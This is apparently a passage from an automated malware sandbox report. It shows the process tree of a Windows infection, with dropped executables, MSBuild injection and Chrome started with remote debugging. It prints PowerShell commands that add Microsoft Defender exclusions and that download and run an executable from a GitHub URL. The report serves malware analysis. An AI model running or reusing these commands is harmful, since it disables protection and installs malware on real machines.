                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4424
                                                                  • C:\Users\Admin\AppData\Local\Temp\10064900101\WE297Tp.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10064900101\WE297Tp.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:12568
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Checks processor information in registry
                                                                      PID:12016
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                        6⤵
                                                                        • Uses browser remote debugging
                                                                        • Drops file in Windows directory
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                        PID:7324
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff82fe0dcf8,0x7ff82fe0dd04,0x7ff82fe0dd10
                                                                          7⤵
                                                                            PID:7276
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1592,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2592 /prefetch:3
                                                                            7⤵
                                                                              PID:6556
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2484,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2480 /prefetch:2
                                                                              7⤵
                                                                                PID:7604
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2176,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2604 /prefetch:8
                                                                                7⤵
                                                                                  PID:7656
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3192 /prefetch:1
                                                                                  7⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:8908
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3240 /prefetch:1
                                                                                  7⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:2952
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4440 /prefetch:1
                                                                                  7⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:10140
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5176,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5188 /prefetch:8
                                                                                  7⤵
                                                                                    PID:10532
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5244 /prefetch:8
                                                                                    7⤵
                                                                                      PID:8012
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5196,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5312 /prefetch:8
                                                                                      7⤵
                                                                                        PID:10400
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5420,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5376 /prefetch:8
                                                                                        7⤵
                                                                                          PID:1196
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5228,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4220 /prefetch:8
                                                                                          7⤵
                                                                                            PID:12656
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=516,i,2407488560109211511,14333688483444910585,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5424 /prefetch:8
                                                                                            7⤵
                                                                                              PID:7280
                                                                                      • C:\Users\Admin\AppData\Local\Temp\10064910101\lBiQciH.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\10064910101\lBiQciH.exe"
                                                                                        4⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:12700
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\pdgebznlgy', 'C:\Users', 'C:\ProgramData'"
                                                                                          5⤵
                                                                                            PID:6728
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\pdgebznlgy', 'C:\Users', 'C:\ProgramData'"
                                                                                              6⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:12396
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe'"
                                                                                            5⤵
                                                                                              PID:2412
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/mineratowerst.exe' -OutFile 'C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe'"
                                                                                                6⤵
                                                                                                • Blocklisted process makes network request
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Downloads MZ/PE file
                                                                                                PID:6348
                                                                                            • C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe
                                                                                              "C:\Users\Admin\AppData\Local\pdgebznlgy\utxikedhsa.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:3424
                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                      1⤵
                                                                                        PID:4784
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                        1⤵
                                                                                          PID:2872
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                          1⤵
                                                                                            PID:452
                                                                                          • C:\Windows\system32\taskmgr.exe
                                                                                            "C:\Windows\system32\taskmgr.exe" /4
                                                                                            1⤵
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Checks processor information in registry
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:5448
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                            1⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Checks processor information in registry
                                                                                            • Enumerates system info in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:12408
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff843bfdcf8,0x7ff843bfdd04,0x7ff843bfdd10
                                                                                              2⤵
                                                                                                PID:13176
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1776,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                                2⤵
                                                                                                  PID:3816
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2080,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2076 /prefetch:2
                                                                                                  2⤵
                                                                                                    PID:232
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2408,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=2572 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:6256
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3092 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:6296
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=3108 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:6304
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4188 /prefetch:2
                                                                                                          2⤵
                                                                                                            PID:6440
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=2884,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4160 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:6564
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5428,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5452 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:8304
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5688,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4728 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:8996
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5792,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5832 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:9304
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=504,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5116 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:12120
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5256,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=5332 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:12136
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5580,i,2917351420124786465,17313363451152622704,262144 --variations-seed-version=20250409-205551.032000 --mojo-platform-channel-handle=4920 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:12152
                                                                                                                      • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                        1⤵
                                                                                                                          PID:1868
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\f1e82329e5\namez.exe"
                                                                                                                          1⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:7404
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                          1⤵
                                                                                                                            PID:9600
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{8525131a-9876-4fef-90f2-de1ba3475201}\d883fe50-0491-44e1-a09d-494a30983a86.cmd"
                                                                                                                            1⤵
                                                                                                                              PID:11332
                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                2⤵
                                                                                                                                  PID:11672
                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                  2⤵
                                                                                                                                    PID:11768
                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                    2⤵
                                                                                                                                      PID:11860
                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                      2⤵
                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                      PID:11912
                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                      2⤵
                                                                                                                                        PID:11980
                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                        2⤵
                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:12032
                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                        2⤵
                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:12092
                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                        2⤵
                                                                                                                                        • Runs ping.exe
                                                                                                                                        PID:5700
                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                        2⤵
                                                                                                                                          PID:2724
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                          2⤵
                                                                                                                                            PID:5028
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:2384
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                            2⤵
                                                                                                                                              PID:12304
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                              2⤵
                                                                                                                                                PID:12372
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:12448
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                2⤵
                                                                                                                                                  PID:12500
                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                  2⤵
                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                  PID:12544
                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                  2⤵
                                                                                                                                                    PID:12596
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                    2⤵
                                                                                                                                                      PID:12648
                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:12696
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:12760
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                          2⤵
                                                                                                                                                            PID:12820
                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4564
                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                              2⤵
                                                                                                                                                                PID:324
                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:936
                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                  2⤵
                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                  PID:9156
                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:9220
                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:9280
                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                    2⤵
                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:9324
                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                    ping 127.0.0.1 -n 1
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:9380
                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:9428
                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                      2⤵
                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                      PID:9488
                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:9776
                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:9980
                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                        2⤵
                                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:10160
                                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                                        ping 127.0.0.1 -n 1
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3032
                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                          2⤵
                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                          PID:10996
                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                          2⤵
                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                          PID:11052
                                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                                          ping 127.0.0.1 -n 1
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:11156
                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                            ping 127.0.0.1 -n 1
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:11444
                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                              ping 127.0.0.1 -n 1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4352
                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                2⤵
                                                                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                PID:12156
                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                ping 127.0.0.1 -n 1
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:12192
                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                  PID:12244
                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                  ping 127.0.0.1 -n 1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2272
